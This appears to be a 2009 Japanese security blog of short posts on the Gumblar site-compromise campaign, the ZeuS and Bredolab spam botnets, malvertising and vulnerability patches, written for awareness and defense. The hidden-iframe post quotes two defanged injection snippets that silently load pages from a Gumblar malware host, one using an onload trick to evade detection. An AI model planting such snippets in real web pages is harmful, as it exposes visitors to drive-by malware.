UnderForge of Lack

Gumblar.x感染に関してのお知らせ
訪問者にウィルス感染の危険性を告知したほうがいいんじゃない？
というのは置いておきまして、貴重な侵入IPのログが出ていました。

というか、あまりにも予想通りで失笑を禁じえなかったのですが

----------
208.43.209.186
AS36351 SOFTLAYER Technologies Inc.
マタオマエカ・・・
SoftLayerも巨大になりすぎて、防弾ホスト化してしまってることに気がついてないのでしょうか？

逆引きのelvis.bamboocrickethosting.comは
SpamCannibalのBlackListに載っています

----------
66.7.201.206
AS33182 HostDime.com

逆引き：server.chulkana.com

66.7.204.23にGumblar一次感染サイトが存在しますね
あと、iframe組(qxfcuc. inf0)へのインジェクションも存在します。

----------
74.54.218.66 as fit.websitewelcome.com
74.53.143.50 as vs2.persiantools.com
AS21844 THEPLANET-AS2
爆笑

なんかもう笑うしかないですねコレは・・

ちなみに、犯人が本当にこの物理回線を使用している保障はどこにもなく、SSHでリモートログインして更にFTPを掛けている可能性が高いと考えています。

もう自律システム単位で葬ってしまいたい・・
（けっこう難しい）理由：
スタートアップに人気のホスティングサービスはSoftLayer、Amazon、Slicehost -- 2009.08
THE PLANETだけは問答無用で葬り去ってますが・・・

----------
補足：

前回の Gumblar 侵入時には ラトビアの JUNIK 及び ウクライナの　Eurohost LLC からFTPアクセスがあったことを確認しています。
今回、そうした「犯人の物理的なアクセス場所に近いと推測されるISP」を使っていない点からみて、相当の準備をして（実際に5カ月の準備期間があったわけですから・・・）再攻撃を開始したことは容易に推測できます。
真のC&Cがどこにあるのか？を掴ませないうちに、表面上の撤退を図っている点を見ても、再度の攻撃は更に手の込んだものになるでしょう。

また、blog主様を非難するつもりは毛頭ありませんので御理解頂きたいと思います。
もっと多くのサイトが全くの無告知でサイト再開しているのが常ですので。

そのあたりのモラルの問題に関しては（自分はもう）言及するつもりはありません。

EoF

日本茶の日
ガス記念日
世界勤倹デー (倹約しましょう)
宗教改革記念日 (マルティン・ルターが、「95ヶ条の論題」を教会の扉に提示した)
天長節祝日 (大正天皇の誕生日は8月31日であるが盛夏では式典の執行に不都合があるため)

----------
You may happy Halloween?
だいたい、日本には万聖節なんか関係ないし、製菓メーカーのイベントと化してる気はしますが・・楽しめればいいか（笑）

もちろん楽しめない側面もあるわけでして・・
Poisoned candy scare（訪問してきた子供たちに毒入りキャンディを配った事件）
やら、
今夜、山手線を厳重警戒せよ！　ハロウィーンでＪＲ - 2008.10.31

いっぽう Google キーワードがハロウィン関連で急上昇するのも当然のこと
A ghooooulish Googleween
日本では仮装行列はあんまり流行してないようですが、今後は縫製メーカあたりも力を入れてくるんでしょう・・・

で・・セキュリティ的には
BlackHat SEO(SEO Poisoning)やら spam やら Phishingやらもありまして、特に海外発のイベント（？）ということもあり英語サイトや英文メールにもついついクリックしてしまう人が居るようですので注意しましょうネ。

Trick or Treat With Spam and Malicious Screensavers
Just think of it: Would you like some candy or Viagra for Halloween?
イラネーヨ（笑）
This Halloween, Enjoy the Treats but Be Wary of Online Tricks
Trick or Threat?
Koobface, ZeuS and Ilomo(Clampi) botnets
FakeAV
and BlackHat SEO
キーワード的には合ってるけど、GumblarとBredolabも忘れないであげてください・・・
Trick or treat?
use this discount code: HALL-6666（笑）
最近は、悪質サイトなのか正規サイトなのか見分ける術が無くなりつつありますので、自己防衛が必須ですね。

----------
Tales of Gumblar

現在は一時的に身を引いた Gumblar.Xですが、今後どうなるかは（作成者以外）誰にもわかりません。

The new gumblar
感染（陥落）サイト国別リスト ワースト20

7271	UNITED STATES*
704	RUSSIAN FEDERATION
675	REPUBLIC OF KOREA
619	ISLAMIC REPUBLIC OF IRAN
540	TURKEY
510	GERMANY
499	INDIA
487	JAPAN
400	THAILAND
382	POLAND
379	BRAZIL
345	ARGENTINA
298	CZECH REPUBLIC
187	HUNGARY
182	BELGIUM
173	ITALY
163	ROMANIA
159	UKRAINE
157	FRANCE
117	VIET NAM

A deeper analysis of counts in Japan revealed at least 487 compromised sites, of which 357 are still injected with malicious URLs at the time of writing.
日本は堂々の８位入賞・・・

Of course, the numbers above aren't final and are rising every day.
そう、まだ終わってないのです。
報道等をみていると、「XPで起動しなくなったウィルス騒ぎ」とか的外れなことを言っているところが多いですが、ウィルスでPCが起動しなくなったことが問題なのではなく、既にバックドアによってIDやらPasswordやらが抜かれている可能性がある点が問題なのです。

といっても前回のGumblar(Martuz)終息後に、各メディアであれだけ注意喚起されたにもかかわらずこの有様ですから、根本的な解決は難しそうです。

----------
Repeat after me "Did you apply test and test?"

MS09-043: Microsoft Office Web コンポーネントの脆弱性により、リモートでコードが実行される (957638)
公開日: 2009年8月12日 | 最終更新日: 2009年10月28日
なぜこのセキュリティ情報は 2009 年 10 月 27 日に更新されたのですか?
マイクロソフトは Microsoft Office Access Runtime 2003 がインストールされている環境での検出の問題を解決する Microsoft Office 2003 Service Pack 3 および Microsoft Office 2003 Web Components Service Pack 3 用の更新プログラムを再度提供するために、このセキュリティ情報を再リリースしました。これは検出の変更のみで、バイナリへの変更はありません。更新プログラムがシステムに正しくインストールされたお客様は、この更新プログラムを再インストールする必要はありません。

MS09-062: GDI+ の脆弱性により、リモートでコードが実行される (957488)
公開日: 2009年10月14日 | 最終更新日: 2009年10月29日
2009/10/29:
このセキュリティ情報ページを更新し、Microsoft Office Visio Viewer 2007、Microsoft Office Visio Viewer 2007 Service Pack 1 および Microsoft Office Visio Viewer 2007 Service Pack 2 を影響を受けるソフトウェアに追加し、SQL Server 2008 および SQL Server 2008 Service Pack 1 を影響を受けないソフトウェアに追加しました。

あいかわらず、理解不能な日本語デス

マイクロソフト、10月度パッチの不具合に対処
米国Microsoftが2週間前にリリースした10月度の月例セキュリティ・パッチの一部で不具合が生じており、同社は対応に乗り出した。
同社はここ数日の間に、2件のセキュリティ・アップデートを再リリースしたほか、1件の問題に関する解決方法を公表した。この問題とは、Windows CryptoAPIのパッチにより、Office Communications Serverのサービスが動かなくなるというものだ。

これだけ脆弱性が多いと見落としもあるのは、ある意味ショウガナイのでしょうね。

----------
ノミ行為は法律違反です

どのBotnetが、どんな手段で、どのサービスを狙ってくるのか、BOOKIEあたりが始めそうな勢いですが（苦笑）
Myspaceのパスワード初期化を騙るスパム
今回は ZeuSで、eMail(spam)を使い、パスワード初期化の案内から 添付ファイルで感染誘導しています。

次は・・・？

----------
Donbot

米Pricewert(3FNの運営元）の停止後、Pushdo/Cutwailによるspamが少しだけ減りましたが、すぐに元の水準に戻ってしまい、「いつものいたちごっこ」が続いています。

そんな中、黙々と活動を続けるBotnet Donbotの存在を FireEyeが解析、レポートしています。
A little more on Donbot...

元は、McColo を拠点としていた単純な spam-bot だったようですが、spam送受信コマンドの手口や隠蔽化（潜伏）の手口が巧妙化していることが判ります。
とりわけ興味深いのは、感染者（bot)がブラックリストに載ってしまった場合、ブラックリストから解除されるまで「bot活動を停止する」ためのコマンドが存在している点です。

現在の C&C 存在先・・・KRYPT TECHNOLOGIES
どっかで見たような・・？

----------
Day -29- DNS port 53

Cyber Security Awareness Month - Day 29 - dns port 53

----------
Day -30- VPN port (valious)

Cyber Security Awareness Month - Day 30 - The "Common" IPSEC VPN Protocols - IKE / ISAKMP (500/udp), ESP (IP Protocol 50), NAT-T-IKE (500/udp, 4500/udp), PPTP (tcp/1723), GRE (IP Protocol 47)

IKE (Internet Key Exchange) : 500 UDP
ESP (Encapsulating Security Payload) : IP Protocol 50
NAT-T (NAT Traversal in the IKE) : 4500 UDP
PPTP (Point to Point Tunneling Protocol) : 1723 TCP
(*)PPTP を理解する
(*)PPTPによるVPNの構築
AH (Authentication Header) : IP Protocol 51
GRE (Generic Routing Encapsulation) : IP Protocol 47

勉強してもしても追いつかない VPN 関連（苦笑）
概要の入門はこのへんでしょうか？
第2回　インターネットVPNの基礎知識

----------
ジャストキーエンス

ジャストシステム創業者の浮川夫妻、取締役会長/副会長を辞任

残念です・・

----------
Google Safe Browsing STATUS:
| 1256950805 | B | [goog-black-hash 1.43366 update]
| 1256950802 | M | [goog-malware-hash 1.16835 update]
| 324983 | current blocked
| 879127 | total logged

EoF

初恋の日 (島崎藤村)
香りの記念日(第7回国民文化祭 にで「世界香りフェアIN能登」開催)
たまごかけごはんの日
宇宙戦争の日

----------
ZeuS vs Bredolab

抗争してるのか、単に同じグループ内の「競争」なのかよくわからない２つのBotnetですが

Facebookのパスワード初期化メールを騙るスパム: Bledolab
Facebookのログインシステム変更を騙るスパム: ZeuS

という感じで似たようなことを似たようなシチュエーションで行っています。

ZeuS(Zbot)インストーラ
PWS:Win32/Zbot.gen!R[Microsoft] 2009.01.15
システムの下に twain32 ディレクトリを作成、そこに local.dsとuser.ds をドロップしています。
Trojan-Spy.Zbot.YETH[PC Tools] 2009.10.29
システムの下に lowsec ディレクトリを作成、そこに local.dsとuser.ds をドロップしています。

Bredolabインストーラ
Trojan-Downloader.Win32.Bredolab [Ikarus] 2009.10.29
やっぱり local.dsと user.dsのドロップが見られます。

この辺が共通してるのではないか？と思われている部分なのでしょうが、そもそも ZeuSはMalware SDK(苦笑）の名前ですので、同じマルウェア作成キットを使って作られた可能性も否定できません。

参考：
Win32/Bredolab
Trojan.Bredolab
Bredolab.gen
各社の詳細を見てもビヘイビアがバラバラ・・・

HINFOに"Casio" "Calculator"というデータが、、
カシオ計算機！？

----------
Secunia CSI3.0 released

Secunia CSI 3.0 - Final

企業向け脆弱性調査ツールの Secunia CSIがPublic betaを終え、正式にリリースされました。
Secunia Corporate Software Inspector (CSI) 3.0
料金体系がよくわからないのですが、とりあえず申し込んでみようかな（怒られるかな・笑）

----------
コンピュータはマルウェアの夢を見るか？

ミタクナイミタクナイ・・

ブレランの原作「アンドロイドは電気羊の夢を見るか?」(Do Androids Dream of Electric Sheep?)ですね。
Do machines dream of electric malware?
これだけ立て続けにこのようなpostが書かれているということは、相当数の「何でブロックされてるんだよ！」のような苦情が飛んでいるのでしょう・・

参考：
badwarebusters.org
飛び交う悲鳴・・・

余談：
「血のような」警告ウィンドウからの復旧手順が日本語化されています。
サイトが乗っ取られた

Google Webmaster Toolにおけるサイト所有権の確立方法
ウェブマスター/サイト所有者 ヘルプ/サイトの追加
ここのようにFTPも何も許可されていない場合、サイドバーに投げ込むしかないんですが・・・認識してくれません（笑）

----------
A ISP down regarding ZeuS

Well known ZeuS hosting ISP “Group Vertical” offline

ZeuS関連の wspoem configやら、C&C（と思われる）やらを大量にホスティングしていた "Group Vertical Ltd"(GR-VERTICAL-AS):AS49365 が応答停止になったそうです。

といっても、ZeuSの勢いが衰えているようには・・・・

----------
Gumblar続報

by so-netさん
Gumblarに異変(1)「攻撃コード」が一斉に書き換えられ無害化、その意味は？
Gumblarに異変(2) Adobe Reader攻撃も減少～なお残る多数の改ざんサイト
Webサイトの管理者の方は、ページに見知らぬリンクが埋め込まれていないか、見知らぬPHPファイル（ファイル名は不定）が設置されていないかを確認し、万が一、見つかった場合には、ウイルスに感染していないパソコンを使用してサイトのパスワードを変更。攻撃者の手からサイトを奪取し、再改ざんされないよう備えていただきたい。
こうなるともう戦争なんです。

警句として最も適しているのは、ilion様のコレでしょう
gumblar自己中心派
有害なコードから無害なコードに書き換えられてしまったサイトは
いつでも再び有害なコードに書き換えられるサイトでもあります。

天災は忘れた頃にやってくる 寺田寅彦
いや・・人災ですねこれは（笑）

----------
つぶやき釣り

Twitterのセキュリティリスクもなかなか無くなりません・・

No, it’s not you on there
Twitter phishers are after your password
"hi. this you on here?" という文面のspam mailが飛び交っており、フィッシングサイトに誘導されるというもの。

Twitterの偽ログイン・ページにご用心――新手のフィッシング詐欺が発覚
Twitterを狙う詐欺メールが流通、ログイン情報が標的？

どこかのID/Passwordを盗めば、同一のID(email addr)とPasswordが水平的に漏えいしますので、Passwordは各サービス毎に変更することが重要です・・・が・・それを遵守できる人がどれだけいることか

さらに別のフィッシング（住所なども）
Look and feel great! Try this pill (Or how to make your wallet lighter?)
別のフィッシングはダイエットを狙っているようです。
“I lost 25lbs using this ”
“whoa this works. i feel good and look good ”
“lol it’s amazing. look and feel great with ”
体重ではなく財布が軽くなるという寸法のようで・・

----------
もうすぐハロウィン

というわけで、Sophosはハロウィンを 「国際ゾンビPC撲滅の日」に制定しようと謳っています
International Kill-A-Zombie Day will be a thriller for Halloween, says Sophos
ハロウィンを「ゾンビPC撲滅デー」に――英Sophosが提唱

ぜひSophosだけではなく、AMTSO等と連携して広めてほしいです。

実際のHalloweenは・・・
Spooky Halloween - scareware or crimeware?

Blackhat SEO Aggressively Targets Halloween Related Keywords
ブラックハットSEO、積極的にハロウィン関連のキーワードをターゲットに

spamやらscareware(Jack'O lanternにかけてるのかな？)やらBlackHatSEOやらに汚染されているようですが・・・

----------
ATWORDがCSSを吹っ飛ばしてくれたので、再構築に時間を食われました。

Google Safe Browsing STATUS:
| 1256864405 | B | [goog-black-hash 1.43294 update]
| 1256864402 | M | [goog-malware-hash 1.16811 update]
| 324282 | current blocked
| 873270 | total logged

数日間収集サーバが堕ちていたので、loggedがおかしくなっているかも・・
（GSBは30分おきの更新ですが、ここでは４時間おきにcron取ってます）

EoF

ホームビデオ記念日(ビデオ戦争)
おしぼりの日 (全国おしぼり協同組合連合会)
とらふぐの日

----------
don't update firefox (with Norton)

またやらかしてくれたようで・・
NIS2010のアップデートでアドオンが使用できなくなる問題が発生 -- Mozilla Flux
アドオンマネージャから個別のアドオンの設定画面を呼び出そうとすると処理が停止してしまうほか、アドオンを更新しても、再起動を促すメッセージは表示されるものの、通知バーが出ないのが特徴だ。とくに前者は、Firefox本体を終了してもウィンドウが残ってしまい、タスクマネージャでプロセスを消すことを余儀なくされる。不便なことおびただしい。

会社のPCに入れる前に気がついてよかった・・・
かといって脆弱性の残っていることが判っているバージョンを使い続けるわけにもいかず・・・セキュソフトの都合で脆弱性バージョンを使うってセキュソフトの存在意義が問われそうですね（苦笑）

Re: Norton Toolbar disappears after applying 17.1.0.14 patch
We don't have a firm ETA on the fix right now.
NO ETA™
あと、こんなのも起きてる様子・・・
Unable to launch Microsoft Outlook after applying 17.1.0.14 patch
but I cannot get Outlook to open at all. I get a message "Cannot start Microsoft Outlook. Cannot open the Outlook window." I do a lot of my small business work by e-mail, so this is fairly serious.

会社のNorton信奉もそろそろ何とかしたい・・・

----------
BlackBerryからの会話はすべて聞かせてもらった！

ガラッ！って効果音が必要だったかな？
BlackBerry PhoneSnoop Application Used to Spy on Users
US-CERT is aware of public reports of a new software application called PhoneSnoop. This software allows an attacker to call a user's BlackBerry and listen to personal conversations. In order to install and setup the PhoneSnoop application, attackers must have physical access to the user's device or convince a user to install PhoneSnoop.

US-CERT warns about BlackBerry spyware app
PhoneSnoop – Turn a BlackBerry into a portable bug

BlackBerryの盗聴アプリ「PhoneSnoop」に要注意
RIM、BlackBerryの盗聴アプリに見解
RIMが調査したところ、PhoneSnoopは特定の電話番号からの着信で起動し、端末を盗聴デバイスに変えてしまうことが分かった。盗聴できるのは端末での通話内容ではなく、端末の周囲の音声であるといい、端末にセキュリティホールが存在するわけではないと説明している。
実際に盗聴するには、US-CERTが解説しているように標的となるユーザーの端末へPhoneSnoopを直接インストールする必要があり、攻撃手法の難易度は極めて高いという。

とりあえずは、端末の物理的操作が必要なようですが、BlackBerryユーザは自分の端末（あるいは会社の支給品）にどんなアプリがインストールされているか把握する必要があるということでしょう。
※上司が盗聴してるかも？とか考えるとちょっと怖い・笑

----------
Cisco to Acquire ScanSafe

Cisco Announces Intent to Acquire ScanSafe
SAN JOSE, Calif. – Oct. 27, 2009 – Cisco today announced its intent to acquire privately held ScanSafe, Inc.
お～
これは予想していなかった買収です。
Gumblarなどの解析結果は今後はCiscoから出されるのかな？（笑）

ともあれ、「おめでとうございます」。ということにしておきましょう。
Cisco、Webセキュリティ企業のScanSafeを1億8300万ドルで買収

----------
Gumblar calm down

Adobe Reader / Acrobatを狙う攻撃が減少【Tokyo SOC Report】
現在のところ鎮静化傾向にありますが、改ざんされたままのWebサイトもあるので、依然として注意が必要です。クライアントPCでご利用のアプリケーションを最新のバージョンへアップデートすることをご検討ください。

穿った見方をすれば、「目的は達したので戦略的撤退」を果たしただけかもしれません。何しろ５月末から今までずっと潜伏し、網を張っていた組織ですので・・・
この手の犯罪に憶測は禁物ですが。

被害とその実態および回復
新種の「Gumblar」PHPウイルスがはやっています
【警告】新種の「Gumblar」PHPウイルスの猛威　そのメカニズム
「やられ群」１・２・３の組み合わせがねずみ講を連想してしまうのは私だけ？（笑）
想像ですが、やられ群１と２に関しては、旧Gumblarによって盗まれたFTP Credential(s)の中から無作為に抽出したものではないか？と考えています。特に１群にはバーチャルホストに収容されているレンタルサーバを狙っている節があり、対策が難しい点を悪用しているような気がします。（ISPが実稼動機を停止できないため、ISPが各個にユーザへの感染確認などを行うハメになってしまい、結果的に時間稼ぎをされてしまう）

----------
iFrameインジェクションの進化

Evolution of Hidden Iframes

iframeを隠す手段としてよく使われているのが
＜iframe src="hxxp://gumblar .cn/ count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no＞＜/iframe＞
のように visible 属性を none にしたり、 style属性を hidden にしたりする手法です。あるいは、＜div style="display:none"＞のように、直前のdivブロックを非表示にすることもよく目にします。

今回新しく発見された手法は
＜iframe frameborder="0" onload="if (!this.src){ this.src='hxxp://gumblar .cn/ index.php'; this.height='0'; this.width='0';}" ＞dvexgqoexlsvajdiodgqvxswnifzmxo＜/iframe＞
onloadを使って、検出パターンから逃れようとしています。
インジェクション onload属性の利用

----------
DAY -27- Active Directory Ports

137 138 139 および 445 を外部に出し・外部から応答にしている方はさすがに減ったのではないか？とは思っていますが・・・・
Cyber Security Awareness Month - Day 27 - Active Directory Ports
他にも沢山使っています。

こうした Windowsサービスで使用されているポートのトラフィックは VPNを使っているのであればそのトンネルのみを許可、それ以外であれば基本的にはルータ・ファイアウォールでブロックしておいたほうが無難でしょう。
第4回　ネットワーク・セキュリティを実現する「Windowsファイアウォール」 -- 2005.06
もっとも、VPNを経由したADは、細切れになったファイルの転送が激しく遅いという NetBIOSの特徴で、使い物にならないほど速度が低下することがありますが・・・

----------
DAY -28- NTP 123UDP

Cyber Security Awareness Month - Day 28 - ntp (123/udp)

ケルベロス認証は使ってませんが、同期がときどき日単位で狂うことはありますね（苦笑）たぶん、何かの設定がおかしいのでしょうけど、放置していたら怒られそうなので同期頻度を上げたことはあります。

あと time_t()の2036/2038年問題なんかもあったような・・

----------
時間切れ

Google Safe Browsing STATUS:
サーバ堕ちてる（泣）

本日帰社予定～
EoF

[ATTENTION]
Firefox 3.5.4

Firefox 3.5.4 で修正済み

MSFA2009-64	最高	メモリ破壊の形跡があるクラッシュ (rv:1.9.1.4/ 1.9.0.15)
MSFA2009-63	最高	メディアライブラリの更新によるメモリ安全性問題の修正
MSFA2009-62	低	RTL 文字によるダウンロードファイル名の偽装
MSFA2009-61	中	document.getSelection() を通じたクロスドメインのデータ漏えい
MSFA2009-59	最高	文字列数値変換によって発生するヒープバッファオーバーフロー
MSFA2009-57	最高	XPCVariant::VariantDataToJS() におけるクローム特権昇格
MSFA2009-56	最高	GIF カラーマップパーサにおけるヒープバッファオーバーフロー
MSFA2009-55	中	プロキシ自動設定の正規表現解析におけるクラッシュ
MSFA2009-54	最高	Web ワーカーの再帰呼び出しによるクラッシュ
MSFA2009-53	低	ダウンロード済みローカルファイルの改ざん
MSFA2009-52	中	フォーム履歴の漏えい

※ Firefox 3.0.15には MSFA2009-54 はありません。
※ Firefox 3.0.x系列は 2010年１月に寿命切れです。

Mozilla Firefox Multiple Vulnerabilities
指標:4 Highly Critical

Update NOW!

----------
[ATTENTION]
Opera 10.01

Opera 10.01 for Windows Changelog

Certain domain names can allow execution of arbitrary code:Extremely Severe
Opera may allow scripts to access feeds
Web fonts can be used to spoof the page address

Opera Multiple Vulnerabilities
指標:4 Highly Critical

Update NOW!

----------
あと何か Microsoft Updateが・・

KB971644:
Windows Server 2008 プラットフォーム更新プログラムと Windows Vista プラットフォーム更新プログラムの説明
KB972145:
Internet Explorer では、Windows Vista を無効にする場合でも"Internet Explorer"いくつかの UI 語句で Windows Media Player を記載しました。
KB960362:
Windows リボンとアニメーション マネージャー ライブラリの説明

----------
IPv6 RFC4861 DoS

IPv6 を実装した複数の製品にサービス運用妨害 (DoS) の脆弱性
に、YamahaのRTシリーズルータが追加されました。

IPv6プロトコルにおけるサービス運用妨害(DoS)の脆弱性について

機種	該当ファームウェア	ファームウェアリリース
RTX3000	Rev.9.00.08～Rev.9.00.40	Rev.9.00.43
RTX1500, RTX1100	Rev.8.02.14～Rev.8.03.77	rev.8.03.80
RT107e	Rev.8.03.15～Rev.8.03.78
SRT100	Rev.10.00.08～Rev.10.00.31	Rev.10.00.38
RTV700	Rev.8.00.23～Rev.8.00.81	Rev.8.00.84
RTX2000, RTX1000	全リビジョン	順次リリース
RT300i	Rev.6.02.03以降の全リビジョン	順次リリース
RT250i	Rev.8.02.14～Rev.8.02.48	Rev.8.02.50
RT140シリーズ, RT105シリーズ	Rev.6.02.03以降の全リビジョン	リリース予定無し
RT58i	Rev.9.01.11～Rev.9.01.36	Rev.9.01.41
RT57i	Rev.8.00.11～Rev.8.00.87	Rev.8.00.89
RT56v	全リビジョン	リリース予定無し
RTW65i, RTW65b
RT60w	Rev.5.02.04以降の全リビジョン	リリース予定無し
RTA55i	全リビジョン	リリース予定無し
RTA54i	Rev.4.04.03以降の全リビジョン	リリース予定無し

※RT58iにミスがありました。訂正してお詫び申し上げます。
Ymlpha 様、ご指摘感謝です。


Yamaha RT Series Routers IPv6 Neighbor Discovery Protocol Denial of Service
指標:2 Less critical

----------
EoF

速記記念日 (日本速記協会)
ABCの日 (社団法人 日本ABC協会)
群馬県民の日

----------
Gumblar vs 8080 ?

昨日、Sophosの iframes are EVIL! Hate Zeus! を取り上げましたが、Zeus、8080、そしてGumblar.x とが入り乱れてインジェクションコードがおかしくなっているようですね

gumblar自己中心派
とりあえず無害ですが…。
何かほんとに内部抗争でもやってるのかな・・・？

ともあれ、インジェクションコードがコロコロ変わっているということは、攻撃続行中であることだけは事実です

Web サイト経由でのマルウエア感染拡大に関する注意喚起 -- JPCERT/CC

----------
自分の伯母さんにセキュリティアップデートをさせてみた

わかりますか？ この言葉～「プラグインの更新なんて無理！」という方に
実にいいコラムです。皆さんにも見てもらいたいです。

so-netがセキュ企業をどっか買い取って、サポート始めると面白そうなんですケドネ

----------
脆弱性情報 by HITACHI -- 2009.10.27

BGM:
今回は非常に重要かつ判りやすい解説がありますので、必見です。
チェックしておきたいぜい弱性情報＜2009.10.27＞
Adobe Reader，Acrobatのセキュリティ・アップデート（2009/10/13）
マイクロソフト2009年10月の月例セキュリティ・アップデート（2009/10/14）
VMware ESXに複数のぜい弱性（2009/10/16）
Cyber Security Bulletin SB09-285（2009/10/12）(Ooo)

----------
facebook spam

で、まずはBredolab
Malicious Facebook Password Spam
Hey xxxxxxx
Heyかよ！
添付ファイル:
Facebook_Password_c92dd.exe -- 2009.10.26 21/41 (29.27%)
Trojan.Bredolab is Making Yet Another Comeback.

Facebook password-reset spam is Bredolab botnet attack

ということで、妙なspamには気をつけましょう。
※そもそも添付ファイルがついている時点でアウトですけどね・・・

----------
spam disguised FDIC

さらに ZeuS(Zbot)ですが、新たな攻撃方法を・・・
連邦預金保険公社(Federal Deposit Insurance Corporation)のspamから偽装サイトへの誘導を行う・・
Malicious Attacks on Depositors Via Phony FDIC Warnings
中身：Infostealer.Banker.C

Fake FDIC spam campaign spreads Zeus malware -- Gary Warner
pdf.exe -- 2009.10.27 9/41 (21.95%)

fdic.govの偽サイト -- October 27, 2009

あ～ほんとにZeuSはしつこい（苦笑）

----------
Malvertising

ついこないだ、GoogleがMal-Advertisingの話をしたばかりですが

Gizmodo hit by malware adverts

Apologies: We Had Malware Running as Ads On Gizmodo
GIZMODEの広告に、偽アンチウィルスソフトへの誘導広告が載せられ、被害者が出ている模様です。

Gawker Media tricked into featuring malicious Suzuki ads
Gawker MediaはGIZMODEの運営者です。
Gawker Scammed By Malware Crew Pretending To Be Suzuki

この前の NewYorkTimesの一件と同じですね
New York Timesがまさかのマルウェア広告、いったい何が起きたのか?
New York Timesをだまして広告契約、マルウェア配信に利用


----------
VMware New Release

セキュパッチが多すぎて対応に苦慮している方も多いかとは思いますが、VMwareの各種クライアントモデルがバージョンアップしました。

VMware Fusion 3.0
Workstation 7 Release Candidate Available!
VMware ACE 2.6

New VMware Desktop Products Released (Workstation, Fusion, ACE)
VMware Fusion 3.0 went from Release Candidate to General Availability last night, as did VMware Workstation 7.0 and VMware ACE 2.6

Lots of new stuff - the feature I welcome the most is nested VMs. This allows you to run ESX with guests inside of workstation (if you have enough memory that is). This is a great feature if you are doing ESX work on your laptop. This is common in both lab and testing, but we also use this a lot in training. This feature has been in the workstation and fusion products (unsupported) for quite some time, but VMware is finally rolling it into the fold of supported features.

VMwareのようなプロダクツの場合、新機能になったからといって簡単にバージョンアップするわけにもいかず、旧来のバージョンを使い続けてセキュパッチが疎かになるのも困るという二律背反な事象を抱え込んでしまうことが多々あります。

また ESXのほうにセキュリティパッチが出ています。
[Security-announce] VMSA-2009-0015 VMware hosted products and ESX patches resolve two security issues

----------
EMET

Announcing the release of the Enhanced Mitigation Evaluation Toolkit
To help on this front, we are announcing the initial release of a new utility called the Enhanced Mitigation Evaluation Toolkit (EMET). Version 1.0.2 is now available, free of charge at the Microsoft Download Center (Enhanced Mitigation Evaluation Toolkit).

脆弱性が発覚した際に、そのパッチを充てる期間(IN ZERO DAY)、何らかの軽減策を考慮せねばならないことがあるかもしれません（特にエンタープライズ業務の場合）。そうした、セキュリティ的な緩和策を導き出すための手助けとなるツールが MS から出されました。

まだ試してませんが、感想とか聞きたいですね～

----------
Impact of Black Tuesday, Oct2009

先日の１０月パッチにおいて、MSRT(Malicious Software Removal Tool)によって駆除された数のリストが公開されました。
MSRT October Release – Case Study
斜体が FakeAVで、太字がパスワードスティーラですが、ChinaとBrazilは、盗まれてばっかりなんですかね？（苦笑）

日本のリストも出してほしい

----------
西さんが吼える

西和彦曰く「Wikipedia はネットの肥溜」

Wikipediaはネットの肥溜 - 西和彦

そして[要出展]タグを貼られまくるっと・・・

----------
Google Safe Browsing STATUS:
| 1256691605 | B | [goog-black-hash 1.43150 update]
| 1256691602 | M | [goog-malware-hash 1.16763 update]
| 322209 |current blocked
| 860541 |total logged

明後日、通常体制に戻る予定です。　長かった・・・・
EoF

読書の日(読書週間初日)
世界新記録の日(世界記録)
テディベアズ・デー

----------
[EMERGENCY]
言うまでも無く攻撃続行中なわけなんですが、何しろ今回はC&Cがはっきりしないので、Fast-Fluxを一つづつ潰していくしか対処法が無いんです。

で・・いつ記事になるかな～とかワクワク期待していた so-netさんが・・・・
Gumblar再襲来(1) 国内サイトも多数改ざん～以前の改ざんサイトが再改ざん
Gumblar再襲来(2) 「攻撃サイト」も一般サイト/カスペルスキーが確認と警告
Gumblar再襲来(3) Adobe Reader/Flash/IE/Office、攻撃は最新版でブロック
Gumblar再襲来(4) ゲームサイトや競馬サイトが相次ぎ改ざん報告
Gumblar再襲来(5) 感染でパソコン起動せず、サポート窓口に電話殺到

一気に５連弾（笑）気合入ってます
ちなみに Kates は Avira/BitDefender/Kaspersky の検出シグネチャ名称で、Daonolの別称と思ってください。
trojan.zip -- 2009.10.26 07:53:34 (UTC) 23/41 (56.10%)
Trojan-PSW.Win32.Kates.j, Lando

黒い画面にマウスカーソル (Win32/Daonol)
こうして各PCベンダーが一斉にウィルスによる機能回復の手順を出すような事態は相当深刻だと思うのですが、どのくらいの実害が発生しているのかはよくわかりません。

何度も同じコトを言って恐縮ですが、感染したＰＣからPasswordの変更をしないようにしましょう（何度でも盗まれ、再度改ざんされます）

----------
Guardian Down

英ガーディアン紙は中堅の一般紙ですが、その求人サイト Guardian.Jobs がクラックされた模様(USAのサイトは影響なし）・・・
UK newspaper Web site hacked; 500,000 job-seekers affected
登録ユーザの個人情報のうち最大で500,000件が流出した可能性があると発表されています。

Guardian Jobs Security Update

クラッキングの経路などは現時点では不明です。

----------
IPv6関連の脆弱性

IPv6 を実装した複数の製品にサービス運用妨害 (DoS) の脆弱性
IPv6 を実装した複数の製品には、Neighbor Discovery Protocol (RFC4861) に関連したパケットの処理に問題があります。細工されたパケットの処理に起因するサービス運用妨害 (DoS) の脆弱性が存在します。

参考：
IPv6 Secure Neighbor Discovery: Protecting Your IPv6 Layer 2 Access Network

影響下にある製品
IPv6のNDP実装におけるサービス運用妨害（DoS）の脆弱性 -- 古川電工
FITELnet-F80 ×（V01.02(00)以降）
FITELnet-F100 ×（V02.06(00)以降）
FITELnet-F120
FITELnet-F1000 ×V02.06(00)以降）
FITELnet-F2000 ×

IPv6対応製品にDoSの脆弱性、IPAらが注意喚起

IPv6は全然わかってないので、勉強しておきます（苦笑）

----------
IPv6 と 6to4プロトコル

IPv6 Tunneling Protocols: Good for Adoption, Not So Hot for Security
新技術に移行するに当たって様々なセキュリティ的懸念が発生するのは当然のことですが、なかなか知識が追いつきません。

Teredoとは
Teredoとは，Windows Vista端末からIPv6インターネットへの接続を試せる技術の一つ。IPv4のネットワーク経由でIPv6パケットを転送するトンネル技術を使ってIPv6インターネットへ接続する。

Again, I don’t want to scare anyone off. Just know the risks, and take appropriate precautions.

----------
検索するとマルウェアに遭遇する（確率の高い）キーワード

ネット検索で危険なセレブの日本版、マカフィーが報告
インターネット検索で最も危険な日本の有名人は? - マカフィー調査

もっとも、McAfee SiteAdvisorの信頼度の方はアレですが・・・
いちおう、MDL/MalwareURL等からの危険情報を（たぶんボランティアで）転記している方はいらっしゃるようですが、反映が遅い遅い・・・
このサイトは検査待ちです。自動検査の結果が出るまでしばらくお待ちください。

この辺は、NortonSafeWeb あたりも同じ問題を抱えています。
